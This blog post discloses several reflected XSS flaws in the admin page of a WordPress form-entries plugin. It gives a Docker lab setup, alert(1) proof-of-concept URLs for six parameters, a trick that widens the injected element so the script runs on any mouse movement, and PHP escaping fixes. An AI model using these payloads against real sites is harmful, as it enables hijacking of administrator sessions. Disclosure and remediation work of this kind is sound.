After last week's post about CVE-2021-25080, we received another CVE from similar work on the same plugin. This time we found multiple XSS vulnerabilities in the Contact Entries Plugin: let's dive into the vulnerability!

Introduction

CRM Form Entries is a plugin that automatically saves form submissions from several WordPress form plugins.

Setup environment

I set up a Docker environment containing WordPress with the vulnerable plugin:

version: '3.8'
services:
  wp:
    image: 'dockersecplayground/wp:5.6'
    stdin_open: true
    tty: true
    ports:
      - '11080:80'
      - '9000:9000'
    depends_on:
      - db
    environment:
      - WORDPRESS_DB_HOST=db
      - WORDPRESS_DB_USER=dsp
      - WORDPRESS_DB_PASSWORD=dsp
      - WORDPRESS_DB_NAME=wordpress
    volumes:
      - './xdebug.ini:/usr/local/etc/php/conf.d/xdebug.ini'
  db:
    image: 'dockersecplayground/mysql_dsp:latest'
    stdin_open: true
    tty: true
    environment:
      - MYSQL_DATABASE=wordpress
      - MYSQL_USER=dsp
      - MYSQL_PASSWORD=dsp
      - MYSQL_RANDOM_ROOT_PASSWORD=1
networks: {}

I usually use VS Code to analyze the source code; it is great because you can attach to running containers with the Docker and Remote Containers plugins.

XSS Vulnerability Description

The form_id parameter of the vxcf_leads administrator page is vulnerable to reflected Cross-Site Scripting.

First Evidence

The following request:

GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+

returns the list of entries saved in the database.

The form_id value is reflected inside an <input> tag.
The form_id parameter is not sanitized, so it is possible to inject arbitrary values.

The following request:

http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+ 

injects an onmouseover handler into the input element:

<input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label>

Moving the mouse over the input element triggers the vulnerability. Note that the double quote is reflected as \": the value has been backslash-escaped, but a backslash does not escape a quote in HTML, so the attribute still closes. Even though the vulnerability seems to require the user to move the mouse over the input element, the attack can be improved by also injecting a "style" attribute that expands the input element to a large width and height. In this way, as soon as the user opens the link and moves the mouse, the JavaScript code is executed.

Second Evidence

The status parameter is vulnerable to the most dangerous form of XSS, since a script tag is reflected directly into the page: just send the following request

http://example.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date   

and the injected script is executed.

Third evidence

The end_date parameter is vulnerable in the same way as in the second evidence:

http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez2u4g 

Other evidences

The order, orderby and search parameters are also vulnerable to XSS. The following request:

http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=descxg31c%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fd5p60&orderby=fir+ 

is reflected in a hidden input: <input type="hidden" name="order" value="descxg31c"accesskey="x"onclick="alert(1)"//d5p60" />

The following request: 

http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt

is reflected in hidden input: 

<input type="hidden" name="orderby" value="fir ihj17"accesskey="x"onclick="alert(1)"//v9tdt" />

search param:

http://dsp.com:11080/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=e67x3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=

Recommendations for Pentesters

This vulnerability was found with Burp Suite Scanner.

I explored all the website links manually, then ran Burp Scanner, which found the reflected Cross-Site Scripting vulnerability.

Burp Scanner is ideal when you have the source code, because you can deploy the application in a local environment and do not have performance issues.

When you analyze a remote website it may be less effective, and you should choose the fuzzing payloads carefully.

You can explore where the input is reflected manually, or by scripting through a proxy such as MITM Proxy.

Recommendations for Developers

Sanitize user input with safe libraries or HTML-escaping libraries. In WordPress you can use the esc_html() function (https://developer.wordpress.org/reference/functions/esc_html/).

Otherwise, OWASP offers a great API for developers: https://owasp.org/www-project-enterprise-security-api/
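As an added example (not the plugin's own code; the function names below are hypothetical), the following PHP shows the pattern behind the first evidence and the hidden order/orderby inputs quoted above: the same checkbox and hidden inputs are rendered once by concatenating the request value straight into the attributes, and once through WordPress's esc_attr(), the attribute-context counterpart of the esc_html() function linked above. The sort parameters are additionally validated against an allowlist, whose valid values are assumed here. Outside WordPress the escaping helpers fall back to htmlspecialchars(), so the file runs under plain php.

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical;
// the HTML mirrors the snippets reflected on the vxcf_leads page.

// Fallbacks so the file runs under plain `php` outside WordPress.
// Inside WordPress the real esc_attr()/esc_html() are already defined.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable rendering: the request value is only backslash-escaped, which
// reproduces the \" seen in the reflected output above. A backslash does not
// escape a double quote in HTML, so the attribute still closes and the
// injected attributes become part of the tag.
function render_toggle_vulnerable($form_id) {
    $slashed = addslashes($form_id);
    return '<input class="hide-column-tog" name="' . $slashed . '-vxvx-vxurl-hide"'
         . ' type="checkbox" id="' . $slashed . '-vxvx-vxurl-hide"'
         . ' value="' . $slashed . '-vxvx-vxurl" checked="checked" />';
}

// Fixed rendering: every attribute value passes through esc_attr(), which
// turns " into &quot; so the value can never terminate the attribute.
function render_toggle_fixed($form_id) {
    $base = esc_attr($form_id);
    return '<input class="hide-column-tog" name="' . $base . '-vxvx-vxurl-hide"'
         . ' type="checkbox" id="' . $base . '-vxvx-vxurl-hide"'
         . ' value="' . $base . '-vxvx-vxurl" checked="checked" />';
}

// Sort parameters have a small set of legitimate values, so validate them
// against an allowlist before escaping. The allowed values are assumptions.
function sanitize_order($order) {
    $order = strtolower((string) $order);
    return in_array($order, ['asc', 'desc'], true) ? $order : 'desc';
}
function sanitize_orderby($orderby, array $allowed = ['id', 'time', 'status']) {
    return in_array((string) $orderby, $allowed, true) ? $orderby : 'id';
}

// Hidden inputs for the sort state, validated and escaped.
function render_sort_inputs_fixed($order, $orderby) {
    return '<input type="hidden" name="order" value="' . esc_attr(sanitize_order($order)) . '" />'
         . '<input type="hidden" name="orderby" value="' . esc_attr(sanitize_orderby($orderby)) . '" />';
}

// Demo with the decoded first-evidence value and the order/orderby values
// from the requests above (constructed from the URLs on this page).
$form_id = 'cf_5e1kpc" onmouseover=alert(1) ne97l';
echo "Vulnerable:\n" . render_toggle_vulnerable($form_id) . "\n\n";
echo "Fixed:\n" . render_toggle_fixed($form_id) . "\n\n";
echo "Sort inputs (fixed):\n"
   . render_sort_inputs_fixed('descxg31c"accesskey="x"onclick="alert(1)"//d5p60',
                              'fir ihj17"accesskey="x"onclick="alert(1)"//v9tdt') . "\n";
```

Run it with `php example.php`: the vulnerable output reproduces the broken tag shown in the first evidence, while the fixed output keeps the whole value inside a single quoted attribute, and the sort inputs fall back to their defaults because the injected values are not in the allowlist.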